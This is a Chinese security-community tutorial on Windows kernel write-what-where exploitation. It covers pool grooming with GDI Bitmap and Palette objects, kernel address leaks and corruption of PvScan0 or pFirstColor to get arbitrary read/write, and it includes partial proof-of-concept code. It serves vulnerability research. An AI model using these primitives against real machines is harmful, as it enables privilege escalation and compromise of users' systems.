AI 助理
备案控制台
开发者社区 安全 文章 正文

干货丨windows内核www漏洞利用手法(修改版)

2023-05-25 197
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 注:由于上次发出来的不完整,所以删除了重新发完整点的前言:Gcow安全团队复眼小组致力于对漏洞的挖掘和研究,并且对于二进制和web漏洞方面都有所研究,有独立挖掘漏洞和独立复现漏洞的能力,本篇文章由Gcow安全团队复眼小组晏子霜师傅所写!

Write What Where


注:由于上次发出来的不完整,所以删除了重新发完整点的

前言:Gcow安全团队复眼小组致力于对漏洞的挖掘和研究,并且对于二进制和web漏洞方面都有所研究,有独立挖掘漏洞和独立复现漏洞的能力,本篇文章由Gcow安全团队复眼小组晏子霜师傅所写!

BITMAP(位图) 简介

HBITMAP CreateBitmap(int nWidth,int nHeight,UINT nPlanes,UINT nBitCount,const VOID *lpBits);

(nBitCount是一个像素占用的位,如果nBitCount为32,则一个像素为4位 也就是乘4)

Windows7 (X64)

创建堆块大小 0x0240 + nWidth * nHeight * nBitCount

(1503)

创建堆块大小 0x0260 + nWidth * nHeight * nBitCount

(1703)

创建堆块大小 0x0270 + nWidth * nHeight * nBitCount

SURFOBJ.cjBits = nWidth * nHeight * nBitCount

修改SURFOBJ.sizlBitmap结构中的cx和cy,都可以达到类似数组越界漏洞的效果,SURFOBJ.cjBits的大小为pixel data的大小,但如果修改了SURFOBJ.sizlBitmap结构,SURFOBJ.cjBits大小并不进行安全校验.

所以,内核中哪怕1字节的(任意地址修改任意值),(任意地址写固定值,随机值)只要写入的内容不是0,也可以利用该漏洞去修改下一个SURFACE结构的SURFOBJ中的PvScan0,来进行任意地址读写.

如果创建BitMap时 lpBits不指定 则会额外创建池块处理PvScan0

SURFOBJ结构



typedef struct _SURFOBJ { 
DHSURF dhsurf; 
HSURF hsurf;
DHPDEV dhpdev; 
HDEV hdev; 
SIZEL sizlBitmap; 
ULONG cjBits; 
PVOID pvBits; 
PVOID pvScan0; 
LONG lDelta; 
ULONG iUniq; 
ULONG iBitmapFormat; 
USHORT iType; 
USHORT fjBitmap; 
} SURFOBJ, *PSURFOBJ;





释放

BOOL DeleteObject(HGDIOBJ hObject);

该函数删除一个逻辑笔,画笔,字体,位图,区域或者调色板,释放所有与该对象有关的系统资源,在对象被删除之后,指定的句柄也就失效了

获取BitMap地址

Windows10 v1511

使用CreateBitmap创建一个位图,保存返回的句柄,bitmap句柄的最后两个字节是该结构在GdiSharedHandleTable数组中的索引(=>handle & 0xffff).

PEB偏移0xf8(X64)处获取指向GdiSharedHandleTable的指针,该指针指向_GDI_CELL结构的数组

通过句柄的后16位来寻找索引的偏移,每个_GDI_CELL结构大小为0x18(X64),0x10(X86)

GdiSharedHandleTable + (BitMap_Handle & 0xFFFF)*0x18 可以获取SURFACE结构在内核内存中的位置.

通过计算偏移即可获取PvScan0所在的内存地址,配合其他漏洞获取 ARW Primitives

Windows10 v1607 Rs1

使用LocalAlloc分配一块内存,大小为 0x06 * 0x300

使用CreateAcceleratorTable 生成一个有0x300表项的加速器表,此时分配的是一个0x1200大小的内存池块,SessionPool.

User32!gSharedInfo 结构中的 aheList 结构中保存了一个pKernel指针,该指针指向这个句柄的内核地址.

aheList为指向PUSER_HANDLE_ENTRY结构数组的指针

通过加速器句柄(HACCEL)的低16位(PUSER_HANDLE_ENTRY结构数组偏移),可以获取到加速器内核地址.

由于加速器使用的也是SessionPool 所以释放该加速器后,重新申请同样大小的SessionPool则可以使用释放的内存

CreateBitmap(0x0FA0, 0x01, 0x01, 0x08, Data);

0x260 + 0xFA0 = 0x1200 占坑

即可获取SURFACE结构的地址

Windows10 v1703 Rs2

(BitMap的SurFace结构 在v1703上比v1503增大了10)

创建堆块大小 0x0270 + nWidth * nHeight * nBitCount

首先创建一个窗口(RegisterClassW+CreateWindowExW)

memset(LpszMNames,‘A’, 0x1000-10);

创建出保存 lpszMenuName 的内核池为 0x1000 字节大小

因为保存0x10字节的Heap Header 所以说 Size - 0x10

//内存缩紧,提前占用空闲 0x1000 字节的Session Pool 这样就可以保证释放 lpszMenuName 后 创建的 BitMap 稳定复用 lpszMenuName 的内存地址了
while (I < 0x500){
++I;
CreateBitmap(0xD90, 0x01, 0x01, 0x08, Data);
}

如何获取lpszMenuName的内核地址呢

首先获取 UlClientDelta 这是用户桌面堆和内核桌面堆的一个偏移,使用内核桌面堆的地址 减去 UlClientDelta 就是用户桌面堆的地址了.

UlClientDelta = TagWnd.head.pSelf - TagWnd 即可得出用户态映射的桌面堆在内核中的偏移

TagCls = TagWND + 0xa8

Address(lpszMenuName) = *((TagCls + 0x90) - UlClientDelta)

为什么要减去 UlClientDelta 呢,因为内核地址我们没办法读取 只能通过用户模式的映射获取到lpszMenuName,也就是释放之后SurFace结构的地址

这时释放窗口

Session Pool中 空闲一个0x1000字节大小的内核池

CreateBitmap(0xD90, 0x01, 0x01, 0x08, Data);

这时我们就已经占坑了,可以在 Windbg 中看到我们的 SurFace 结构使用了 lpszMenuName 所占用的 SessionPool.


利用 BITMAP 进行任意地址写

创建两个(多个)Bitmap,获取到其中一个SURFACE结构的地址,通过偏移寻找到SURFOBJ结构中的PvScan0,将PvScan0的内容修改为另外一个Bitmap的PvScan0地址.

使用 SetBitmapBits(HBITS_B[M_UAF_ID](PvScan0被修改成另外一个块的结构), 0x08, Where_TO_DO(想要读或写的内存地址的指针));

使用 GetBitmapBits(HBITS_B[W_UAF_ID](另外一个块), 0x08, &EPROCESS);来读取8字节到EPROCESS指向的内存中

使用 SetBitmapBits(HBITS_B[W_UAF_ID](另外一个块), 0x08, Where_TO_DO(想要写入内容的指针));来向设置的地址写入8字节

1字节任意地址读写 利用BitMap提权

实验环境:

Windows7 X64专业版

首先分配0x500个0x1000字节的 Pool

这一步的目的是内存缩紧,缩紧到没有多余的0x1000字节大小的空闲内核池(其实可能还是有=_=,不过问题不大),来干扰Large Pool的分割


for (i = 0; i < 0x500; ++i){
CreateBitmap(0xDC0, 0x01, 0x01, 0x08, Data1);
}

然后分配0x2000字节大小的 Large Pool

Windows7 (X64) 创建池块大小 0x0240 + nWidth * nHeight * nBitCount,

所以此处使用 BigPool = CreateBitmap(0x1DC0, 0x01, 0x01, 0x08, Data);

接着释放这个Pool

DeleteObject(BigPool);

此时,占用了0x2000字节的大块是被释放的

立刻申请两个0x1000字节的块

F_Pool = CreateBitmap(0xDC0, 0x01, 0x01, 0x08, Data1);

S_Pool = CreateBitmap(0xDC0, 0x01, 0x01, 0x08, Data2);

通过泄露BitMap地址,可以发现我们已经占用了释放的Large Pool

SURFOBJ64 结构偏移0x20 处为 sizlBitMap 结构,该结构如下



typedef strucy tagSIZE{
  LONG cx;
  LONG cy;
}SIZE,*PSIZE;

我们只需要覆盖其中一个结构即可进行越界读写内存(OOB);

F_POOL->sizlBitMap = 00000001`00000dc0;

此处,我们通过WWW漏洞将 F_POOL->sizlBitMap.cy 修改成0x02

这样我们的读写范围就变成 0xdc0 * 2 = 0x1B80

即可通过 F_Pool 任意读写 S_POOL 的内容

接下来修改S_POOL的PvScan0指针,即可任意地址读写

 

Palette (调色板) 简介

HPALETTE CreatePalette(const LOGPALETTE *plpal);

创建调色板,只有一个参数为指向LOGPALETTE结构的指针

X86 下 size(PALETTE) 为 0x58 字节大小

X64 下 size(PALETTE) 为 0x98 字节大小




typedef struct tagLOGPALETTE {
    WORD        palVersion;
    WORD        palNumEntries;
    _Field_size_opt_(palNumEntries) PALETTEENTRY        palPalEntry[1];
} LOGPALETTE, *PLOGPALETTE, NEAR *NPLOGPALETTE, FAR *LPLOGPALETTE;

palVersion 设置为 0x0300 即可

palNumEntries 为 palPalEntry 的个数,每个 PALETTEENTRY 结构为 0x04字节大小(包括X64)

CreatePalette(PPlette);

函数会创建一个 (Sizeof(PALETTE) + palNumEntries * 4) 大小的 Kernel Pool 来保存PALETTE结构

PALETTE 结构 末尾的 apalColors 结构 为 PALETTEENTRY结构的数组 默认为 8 字节大小(默认项数为0x02),Kernel Pool 保存 PALETTE 结构时,会根据 palNumEntries 来设置 apalColors 数组的项数

PALETTE 结构中的变量 cEntries 为 LOGPALETTE 结构中的 palNumEntries,来代表当前 apalColors数组有多少项

修改 PALETTE.cEntries 则可以进行 越界读写(OOB)

PALETTE.pFirstColor 为指向 PALETTE.apalColors 地址的指针

修改 PALETTE.pFirstColor 则可以进行 任意地址读写(WWW)

PALETTE 结构



typedef struct _PALETTE { 
BASEOBJECTBaseObject; 
FLONG  flPal; 
ULONG cEntries; 
ULONG ulTime; 
HDC hdcHead; 
ULONG hSelected; 
ULONG cRefhpal; 
ULONG cRefRegular; 
ULONGptransFore; 
ULONGptransCurrent; 
ULONGptransOld; 
ULONG unk_038; 
ULONG64 pfnGetNearest;
ULONG pfnGetMatch; 
ULONG ulRGBTime; 
ULONG pRGBXlate; 
PALETTEENTRY *pFirstColor; 
struct _PALETTE *ppalThis; 
PALETTEENTRY apalColors[1]; 
}PALETTE;

Find Palette Pool

Windbg中搜索创建的调色板 PALETTE结构

!poolfind Gl?8 -session

释放 Palette

DeleteObject(HPalette);

获取 Palette 地址

创建窗口时通过设置窗口类菜单名称,可以分配任意大小的Kernel Session Pool,可以利用这一点来预测Palette结构的地址

wndclass.lpszMenuName = (LPCWSTR)LpszMNames;

(为了避免有相同大小的空闲 Session Pool,先申请 N个 同大小的Palette结构,来占用内存会提高成功几率)

首先算好Palette结构需要占坑的大小,接着创建窗口,使用 HMValidateHandle 函数(BITMAP一节中有介绍)获取tagCls.lpszMenuName 指向的地址,此处为占坑地址,释放窗口,释放窗口类,创建Palette结构即可

tagCls地址获取方法

TagWnd = HMValidateHandle(HWND,1);

返回值为 tagWnd桌面堆在用户态映射的地址

TagWnd.head.pSelf 为 pSelf ,是TagWnd结构在内核池中的地址

Kenrl_Pool_OffSet(DeskTop Heap) = TagWnd.head.pSelf - TagWnd 可以算出 用户态映射的桌面堆 和内核态桌面堆的偏移

TagWnd.pcls 为当前窗口类的地址,也就是tagCls结构的内核地址

TagWnd.pcls - Kenrl_Pool_OffSet(DeskTop Heap) = TagCls 即可获取到用户态映射下TagCls结构的地址

TagCls.lpszMenuName 为 分配的窗口菜单名称,分配在Session Pool里

获取到 TagCls.lpszMenuName 的地址后,释放窗口,以及窗口类,创建PALETTE即可复用

以下为Poc中部分代码





  HINSTANCE hInstance;
HWND hwnd, pwd;     
WNDCLASS wndclass = { 0 }; 
memset(LpszMNames, 'F', 0x1000-0x08);
hInstance = GetModuleHandleA(0);
wndclass.style = CS_HREDRAW | CS_VREDRAW;
wndclass.lpfnWndProc = DefWindowProc;
wndclass.hInstance = hInstance;
wndclass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
wndclass.hCursor = LoadCursor(NULL, IDC_ARROW);
wndclass.hbrBackground = (HBRUSH)GetStockObject(WHITE_BRUSH);
wndclass.lpszMenuName = (LPCWSTR)LpszMNames;
wndclass.lpszClassName = TEXT("case");
if (!RegisterClass(&wndclass)){
printf("Register Window Class Error!\n");
return 1;
}
  hwnd = CreateWindowEx(0, wndclass.lpszClassName, TEXT("WORDS"), 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
printf("hwnd:%p\n", hwnd);
pwd = (HWND)HMValidateHandle(hwnd, 1);
ULONG ulClientDelta = *(ULONG*)((ULONG)pwd + 0x10) - (ULONG)pwd;
ULONG TagCls = *(ULONG*)((ULONG)pwd + 0x64) - ulClientDelta;
PALETTE_Address = *(ULONG*)((ULONG)TagCls + 0x50);
//__asm int 3
printf("TagCls:0x%p\n", TagCls);
printf("TagWnd:0x%p\n", pwd);
printf("PALETTE_Address:0x%p\n", PALETTE_Address);
DestroyWindow(hwnd);
  //内存缩紧
  while (I <= 0x500){
      CreatePalette(Palette);
    ++I;
  }
  //释放窗口类
  UnregisterClass(TEXT("case"), GetModuleHandleA(0));
  //地址泄露!
  HPAL = CreatePalette(Palette);






 


利用 Palette 进行任意地址读写

通过修改 PALETTE.pFirstColor 的指针后,则可使用

SetPaletteEntries(HPALETTE Hpal,UINT iStartIndex,UINT nEntries,LPPALETTEENTRY lppe);

函数进行任意地址写

SetPaletteEntries(HPALETTE,0,0x05,Entries)

参数 1 Hpal 为 CreatePalette 函数返回的调色板句柄

参数 2 iStartIndex 为 从 apalColors 数组中第几项开始写

参数 3 nEntries 为 到 apalColors 数组中第几项结束

参数 4 lppe 为 PALETTEENTRY 结构数组的指针,每项4字节,通过设置此参数来写入任意值

创建两个 PALETTE 结构,覆写 PALETTE.pFirstColor 指针后,可参考BITMAP的利用方法 获取无限制的 ARW Primitiver

使用

GetPaletteEntries(HPALETTE Hpal,UINT iStartIndex,UINT nEntries,LPPALETTEENTRY lppe);

函数进行任意地址读

GetPaletteEntries(HPALETTE,0,0x05,Entries)

参数 1 Hpal 为 CreatePalette 函数返回的调色板句柄

参数 2 iStartIndex 为 从 apalColors 数组中第几项开始读

参数 3 nEntries 为 到 apalColors 数组中第几项结束

参数 4 lppe 为 PALETTEENTRY 结构数组的指针,每项4字节,通过设置此参数来读取任意值


文章标签:
索引
Windows
安全
关键词:
Windows漏洞
Windows内核
Windows内核漏洞
Windows www
Gcow安全团队
目录
相关文章
愿天堂没有BUG(公众号同名)
|
4月前
|
监控 安全 虚拟化
降级攻击可“复活”数以千计的Windows漏洞
在本周举行的黑帽大会(Black Hat 2024)上,安全研究员Alon Leviev曝光了一个微软Windows操作系统的“超级漏洞”,该漏洞使得攻击者可以利用微软更新进程实施降级攻击,“复活”数以千计的微软Windows漏洞,即便是打满补丁的Windows11设备也将变得千疮百孔,脆弱不堪。
愿天堂没有BUG(公众号同名)
44 1
路边两盏灯
|
4月前
|
负载均衡 网络协议 安全
【Azure 应用服务】Azure Web App的服务(基于Windows 操作系统部署)在被安全漏洞扫描时发现了TCP timestamps漏洞
【Azure 应用服务】Azure Web App的服务(基于Windows 操作系统部署)在被安全漏洞扫描时发现了TCP timestamps漏洞
路边两盏灯
52 0
jianz123
|
5月前
|
安全 Windows
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
jianz123
103 2
邢仕冲的一亩三分地
|
6月前
|
Windows
【Windows内核驱动函数(1)】IoCreateSymbolicLink()-----创建符号链接函数
【Windows内核驱动函数(1)】IoCreateSymbolicLink()-----创建符号链接函数
邢仕冲的一亩三分地
60 1
李火火
|
安全 测试技术 Windows
Windows Ancillary Function Driver for WinSock 权限提升漏洞(CVE-2023-21768)
Windows Ancillary Function Driver for WinSock 存在权限提升漏洞
李火火
292 1
李火火
|
存储 JSON 安全
phpStudy 小皮 Windows面板 RCE漏洞
详情看文章内叙述
李火火
290 1
李火火
|
存储 安全 API
Windows Server 2022 21H2 本地域权限提升漏洞(PetitPotam)
Windows Server 2022 Standard/Datacenter 存在本地域权限提升漏洞,攻击者可通过使用PetitPotam工具进行获取服务器SYSTEM权限。
李火火
297 1
jianz123
|
7月前
|
安全 Windows
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
jianz123
70 0
李火火
|
安全 测试技术 数据安全/隐私保护
CVE-2022-21999 Windows Print Spooler(打印服务)特权提升漏洞
2021年6⽉29⽇,安全研究⼈员在GitHub上公开了CVE-2021-1675 Windows Print Spooler远程代码执⾏漏洞的PoC。该漏洞是Microsoft 6⽉星期⼆补丁⽇中公开的⼀个RCE漏洞,其存在于管理打印过程的Print Spooler (spoolsv.exe) 服务中,会影响所有 Windows系统版本。
李火火
144 1
二进制怪兽
|
Windows
[笔记] Windows内核课程:保护模式《二》段寄存器介绍
[笔记] Windows内核课程:保护模式《二》段寄存器介绍
二进制怪兽
72 0

热门文章

最新文章

  • 1
    全面对比linux和windows,选择哪个系统比较好
  • 2
    TechED2010与我(二)—— Windows Phone 7 Develop
  • 3
    Windows 8实用窍门系列:13.windows 8的文件.文件夹管理---2.文件以及文件夹操作
  • 4
    Windows Phone 及 Metro UI 设计讨论
  • 5
    windows下的套接字IO模型
  • 6
    [更新]Windows Phone 实现类似“微博”下拉刷新效果
  • 7
    How-to: 利用Visual Studio升级Windows Phone 7工程
  • 8
    NetMarketShare:Windows 10市场份额接近25%
  • 9
    when you start Windows 7: "The Windows Boot Configuration Data file is missing required information"
  • 10
    Windows Components Reference(Windows组件参考)
  • 1
    电脑ip在哪里查看?windows系统查看ip地址的8种方法
    2846
  • 2
    Windows10下CUDA9.0+CUDNN7.0.5的完美安装教程
    528
  • 3
    FFmpeg开发笔记(十七)Windows环境给FFmpeg集成字幕库libass
    159
  • 4
    【windows自带exe】使用`findstr.exe`来搜索包含某个字符串的文件
    636
  • 5
    如何在Windows上使用Docker,搭建一款实用的个人IT工具箱It- Tools
    116
  • 6
    LabVIEW启用/禁用Windows屏幕保护程序
    71
  • 7
    LabVIEW安装程序需要Windows1064位(版本1507)或更新版本
    225
  • 8
    LabVIEW在Windows平台上的图形导入
    67
  • 9
    LabVIEW应用程序在Windows版本之间的字体变化
    70
  • 10
    Windows 系统下安装
    50

    • 相关电子书

    更多
  • 《云服务器运维之Windows篇》
  • TAKING WINDOWS 10 KERNEL
  • ECS运维指南之Windows系统诊断

    • 相关实验场景

    更多
  • 快速配置Windows云服务器
  • 手动搭建FTP站点(Windows)
  • 1分钟代码漏洞自动检测
    • 下一篇
    阿里云无影云电脑免费试用,最长可试用3个月